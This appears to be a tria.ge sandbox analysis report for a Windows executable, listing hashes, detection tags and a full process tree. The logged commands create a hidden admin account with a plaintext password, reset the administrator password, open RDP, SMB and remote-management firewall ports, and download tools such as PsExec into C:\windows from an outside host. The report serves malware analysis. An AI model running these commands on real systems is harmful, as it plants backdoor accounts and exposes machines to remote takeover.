Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/09/2024, 21:32

General

  • Target

    2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe

  • Size

    1.2MB

  • MD5

    1a027bd2e0bd67f33bb6ad6f4029b1c6

  • SHA1

    763e46995b5401cb489a25c3b947000368911d4d

  • SHA256

    2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50

  • SHA512

    d27761d31cca6c425e555f85f9e12b076ce62efca1756f15e65d3bf1013ca660ad47464b6785d10c815e2b82f8de953db6a45b98e079fa462b73ac613434849f

  • SSDEEP

    24576:XD7Xr5my0DPP23Iy5YAmRW6B8If0s83I4eqowSwa1X9tqY7Jxiq+n:XD7Xroy0DPP23Iy5YAmw6B8If0F3Iwo4

Malware Config

Signatures

  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

    Using powershell.exe command.

  • Disables taskbar notifications via registry modification
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 7 IoCs
  • Modifies WinLogon 2 TTPs 5 IoCs
  • Power Settings 1 TTPs 7 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Hide Artifacts: Hidden Users 1 TTPs 2 IoCs
  • Drops file in Windows directory 13 IoCs
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 32 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 35 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
    "C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe"
    1⤵
    • Modifies visibility of file extensions in Explorer
    • Modifies WinLogon
    • Hide Artifacts: Hidden Users
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies Internet Explorer start page
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:3264
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "net user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Windows\system32\net.exe
        net user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:852
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes
          4⤵
            PID:900
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "net user billros /active"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3720
        • C:\Windows\system32\net.exe
          net user billros /active
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4692
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user billros /active
            4⤵
              PID:3588
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "net localgroup administrators" /add billros
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3480
          • C:\Windows\system32\net.exe
            net localgroup administrators /add billros
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3184
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 localgroup administrators /add billros
              4⤵
                PID:1636
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "net user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1056
            • C:\Windows\system32\net.exe
              net user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4664
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes
                4⤵
                  PID:2576
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "net user administrator /active"
              2⤵
                PID:392
                • C:\Windows\system32\net.exe
                  net user administrator /active
                  3⤵
                    PID:3808
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 user administrator /active
                      4⤵
                        PID:5288
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "powershell -command set-localuser billros -passwordneverexpires $true"
                    2⤵
                      PID:1516
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -command set-localuser billros -passwordneverexpires $true
                        3⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5364
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell -command set-localuser administrator -passwordneverexpires $true"
                      2⤵
                        PID:3104
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -command set-localuser administrator -passwordneverexpires $true
                          3⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5296
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c netsh int tcp set global chimney=disabled rss=disabled netdma=disabled
                        2⤵
                          PID:64
                          • C:\Windows\system32\netsh.exe
                            netsh int tcp set global chimney=disabled rss=disabled netdma=disabled
                            3⤵
                            • Event Triggered Execution: Netsh Helper DLL
                            PID:5272
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c netsh firewall set icmp 8 enable
                          2⤵
                            PID:1476
                            • C:\Windows\system32\netsh.exe
                              netsh firewall set icmp 8 enable
                              3⤵
                              • Modifies Windows Firewall
                              • Event Triggered Execution: Netsh Helper DLL
                              PID:6760
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any
                            2⤵
                              PID:224
                              • C:\Windows\system32\netsh.exe
                                netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any
                                3⤵
                                • Modifies Windows Firewall
                                • Event Triggered Execution: Netsh Helper DLL
                                PID:5968
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any
                              2⤵
                                PID:1968
                                • C:\Windows\system32\netsh.exe
                                  netsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any
                                  3⤵
                                  • Modifies Windows Firewall
                                  • Event Triggered Execution: Netsh Helper DLL
                                  PID:6312
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any
                                2⤵
                                  PID:4152
                                  • C:\Windows\system32\netsh.exe
                                    netsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any
                                    3⤵
                                    • Modifies Windows Firewall
                                    • Event Triggered Execution: Netsh Helper DLL
                                    PID:5924
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any
                                  2⤵
                                    PID:2252
                                    • C:\Windows\system32\netsh.exe
                                      netsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any
                                      3⤵
                                      • Modifies Windows Firewall
                                      • Event Triggered Execution: Netsh Helper DLL
                                      PID:5696
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any
                                    2⤵
                                      PID:208
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any
                                        3⤵
                                        • Modifies Windows Firewall
                                        • Event Triggered Execution: Netsh Helper DLL
                                        PID:6592
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c netsh firewall set service type=remoteadmin enable profile=all
                                      2⤵
                                        PID:4544
                                        • C:\Windows\system32\netsh.exe
                                          netsh firewall set service type=remoteadmin enable profile=all
                                          3⤵
                                          • Modifies Windows Firewall
                                          • Event Triggered Execution: Netsh Helper DLL
                                          PID:6744
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -h off
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4976
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -x -hibernate-timeout-ac 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1004
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -x -hibernate-timeout-dc 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3308
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -x -standby-timeout-ac 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2920
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -x -standby-timeout-dc 15
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2628
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -setacvalueindex 381b4222-f694-41f0-9685-ff5bb260df2e 19cbb8fa-5279-450e-9fac-8a3d5fedd0c1 12bbebe6-58d6-4636-95bb-3217ef867c1a 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4564
                                      • C:\Windows\SYSTEM32\powercfg.exe
                                        powercfg -setdcvalueindex 381b4222-f694-41f0-9685-ff5bb260df2e 19cbb8fa-5279-450e-9fac-8a3d5fedd0c1 12bbebe6-58d6-4636-95bb-3217ef867c1a 0
                                        2⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1072
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command Get-AppxProvisionedPackage -online | where-object {$_.displayname -like "*OneNote*" -or $_.displayname -like "*bing*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*XboxApp*" -or $_.displayname -like "*xbox*" -or $_.displayname -like "*MicrosoftOfficeHub*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*3DBuilder*" -or $_.displayname -like "*BingFinance*" -or $_.displayname -like "*BingNews*" -or $_.displayname -like "*BingSports*" -or $_.displayname -like "*ConnectivityStore*" -or $_.displayname -like "*MicrosoftOfficeHub*" -or $_.displayname -like "*MicrosoftSolitaireCollection*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*Sway*" -or $_.displayname -like "*WindowsMaps*" -or $_.displayname -like "*XboxApp*" -or $_.displayname -like "*ZuneMusic*" -or $_.displayname -like "*ZuneVideo*" -or $_.displayname -like "*xbox*"} | remove-appxprovisionedpackage -online
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2740
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command Get-AppxPackage | where-object {$_.name -like "*windowscommunicationsapps*" -or $_.name -like "*officehub*" -or $_.name -like "*skypeapp*" -or $_.name -like "*getstarted*" -or $_.name -like "*zunemusic*" -or $_.name -like "*windowsmaps*" -or $_.name -like "*bingfinance*" -or $_.name -like "*zunevideo*" -or $_.name -like "*bingnews*" -or $_.name -like "*people*" -or $_.name -like "*windowsstore*" -or $_.name -like "*bingsports*" -or $_.name -like "*bingweather*" -or $_.name -like "*xbox*" -or $_.name -like "*candy*" -or $_.name -like "*feed*" -or $_.name -like "*print3d*" -or $_.name -like "*oneconnect*" -or $_.name -like "*solitaire*" -or $_.name -like "*gethelp*" -or $_.name -like "*spotify*" -or $_.name -like "*cooking*" -or $_.name -like "*Microsoft.ZuneVideo*" -or $_.name -like "*Microsoft.People*" -or $_.name -like "*Microsoft.ZuneMusic*" -or $_.name -like "*Getstarted*" -or $_.name -like "*officehub*" -or $_.name -like "*mixed*" -or $_.name -like "*sway*" -or $_.name -like "*yourphone*" -or $_.name -like "*bing*" -or $_.name -like "*skype*" -or $_.name -like "*3d*" -or $_.name -like "*maps*"} | remove-appxpackage
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2844
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command Get-AppxPackage -allusers | where-object {$_.name -like "*windowscommunicationsapps*" -or $_.name -like "*officehub*" -or $_.name -like "*skypeapp*" -or $_.name -like "*getstarted*" -or $_.name -like "*zunemusic*" -or $_.name -like "*windowsmaps*" -or $_.name -like "*bingfinance*" -or $_.name -like "*zunevideo*" -or $_.name -like "*bingnews*" -or $_.name -like "*people*" -or $_.name -like "*windowsstore*" -or $_.name -like "*bingsports*" -or $_.name -like "*bingweather*" -or $_.name -like "*xbox*" -or $_.name -like "*candy*" -or $_.name -like "*feed*" -or $_.name -like "*print3d*" -or $_.name -like "*oneconnect*" -or $_.name -like "*solitaire*" -or $_.name -like "*gethelp*" -or $_.name -like "*spotify*" -or $_.name -like "*cooking*" -or $_.name -like "*Microsoft.ZuneVideo*" -or $_.name -like "*Microsoft.People*" -or $_.name -like "*Microsoft.ZuneMusic*" -or $_.name -like "*Getstarted*" -or $_.name -like "*officehub*" -or $_.name -like "*mixed*" -or $_.name -like "*sway*" -or $_.name -like "*yourphone*" -or $_.name -like "*bing*" -or $_.name -like "*skype*" -or $_.name -like "*3d*" -or $_.name -like "*maps*"} | remove-appxpackage -allusers
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4508
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/devcon.exe -outfile C:\windows\devcon.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3528
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/Fping.exe -outfile C:\windows\Fping.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3352
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/grep.exe -outfile C:\windows\grep.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4004
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/netscan.exe -outfile C:\windows\netscan.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1840
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/nircmd.exe -outfile C:\windows\nircmd.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3412
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/procexp.exe -outfile C:\windows\procexp.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4708
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/Procmon.exe -outfile C:\windows\Procmon.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1268
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/PsExec.exe -outfile C:\windows\PsExec.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3056
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/putty.exe -outfile C:\windows\putty.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:8
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/TreeSizeFree.exe -outfile C:\windows\TreeSizeFree.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2136
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/winmtr.exe -outfile C:\windows\winmtr.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5008
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/whois.exe -outfile C:\windows\whois.exe
                                        2⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in Windows directory
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1408
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c reg load HKU\default C:\users\default\ntuser.dat
                                        2⤵
                                          PID:4888
                                          • C:\Windows\system32\reg.exe
                                            reg load HKU\default C:\users\default\ntuser.dat
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6332
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
                                          2⤵
                                            PID:3632
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKU\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
                                              3⤵
                                              • Modifies data under HKEY_USERS
                                              PID:7028
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowTaskViewButton /t REG_DWORD /d 0 /f
                                            2⤵
                                              PID:1636
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowTaskViewButton /t REG_DWORD /d 0 /f
                                                3⤵
                                                • Modifies data under HKEY_USERS
                                                PID:7060
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search" /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
                                              2⤵
                                                PID:3048
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search" /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
                                                  3⤵
                                                  • Modifies data under HKEY_USERS
                                                  PID:7048
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\software\microsoft\windows\currentversion\policies\explorer" /v ForceRunonstartmenu /t REG_DWORD /d 1 /f
                                                2⤵
                                                  PID:880
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKU\DEFAULT\software\microsoft\windows\currentversion\policies\explorer" /v ForceRunonstartmenu /t REG_DWORD /d 1 /f
                                                    3⤵
                                                    • Modifies data under HKEY_USERS
                                                    PID:6960
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f
                                                  2⤵
                                                    PID:528
                                                    • C:\Windows\system32\reg.exe
                                                      reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f
                                                      3⤵
                                                      • Modifies data under HKEY_USERS
                                                      PID:6972
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
                                                    2⤵
                                                      PID:4664
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
                                                        3⤵
                                                        • Modifies data under HKEY_USERS
                                                        PID:6164
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_TrackDocks /t REG_DWORD /d 0 /f
                                                      2⤵
                                                        PID:1592
                                                        • C:\Windows\system32\reg.exe
                                                          reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_TrackDocks /t REG_DWORD /d 0 /f
                                                          3⤵
                                                          • Modifies data under HKEY_USERS
                                                          PID:7068
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_trackProgs /t REG_DWORD /d 0 /f
                                                        2⤵
                                                          PID:852
                                                          • C:\Windows\system32\reg.exe
                                                            reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_trackProgs /t REG_DWORD /d 0 /f
                                                            3⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:7000
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v TaskbarMn /t REG_DWORD /d 0 /f
                                                          2⤵
                                                            PID:4356
                                                            • C:\Windows\system32\reg.exe
                                                              reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v TaskbarMn /t REG_DWORD /d 0 /f
                                                              3⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:7084
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v PeopleBand /t REG_DWORD /d 0 /f
                                                            2⤵
                                                              PID:2292
                                                              • C:\Windows\system32\reg.exe
                                                                reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v PeopleBand /t REG_DWORD /d 0 /f
                                                                3⤵
                                                                • Modifies data under HKEY_USERS
                                                                PID:5516
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v StartupPage /t REG_DWORD /d 1 /f
                                                              2⤵
                                                                PID:4144
                                                                • C:\Windows\system32\reg.exe
                                                                  reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v StartupPage /t REG_DWORD /d 1 /f
                                                                  3⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:7076
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v AllItemsIconView /t REG_DWORD /d 1 /f
                                                                2⤵
                                                                  PID:1236
                                                                  • C:\Windows\system32\reg.exe
                                                                    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v AllItemsIconView /t REG_DWORD /d 1 /f
                                                                    3⤵
                                                                    • Modifies data under HKEY_USERS
                                                                    PID:6912
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v Installtheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
                                                                  2⤵
                                                                    PID:4556
                                                                    • C:\Windows\system32\reg.exe
                                                                      reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v Installtheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
                                                                      3⤵
                                                                      • Modifies data under HKEY_USERS
                                                                      PID:7132
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
                                                                    2⤵
                                                                      PID:5004
                                                                      • C:\Windows\system32\reg.exe
                                                                        reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
                                                                        3⤵
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:6304
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v CurrentTheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
                                                                      2⤵
                                                                        PID:760
                                                                        • C:\Windows\system32\reg.exe
                                                                          reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v CurrentTheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
                                                                          3⤵
                                                                          • Modifies data under HKEY_USERS
                                                                          PID:6944
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v DontUsePowerShellOnWinX /t REG_DWORD /d 1 /f
                                                                        2⤵
                                                                          PID:972
                                                                          • C:\Windows\system32\reg.exe
                                                                            reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v DontUsePowerShellOnWinX /t REG_DWORD /d 1 /f
                                                                            3⤵
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:3808
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c reg unload HKU\Default
                                                                          2⤵
                                                                            PID:5312
                                                                            • C:\Windows\system32\reg.exe
                                                                              reg unload HKU\Default
                                                                              3⤵
                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                              PID:7116

                                                                        Network

                                                                        MITRE ATT&CK Enterprise v15

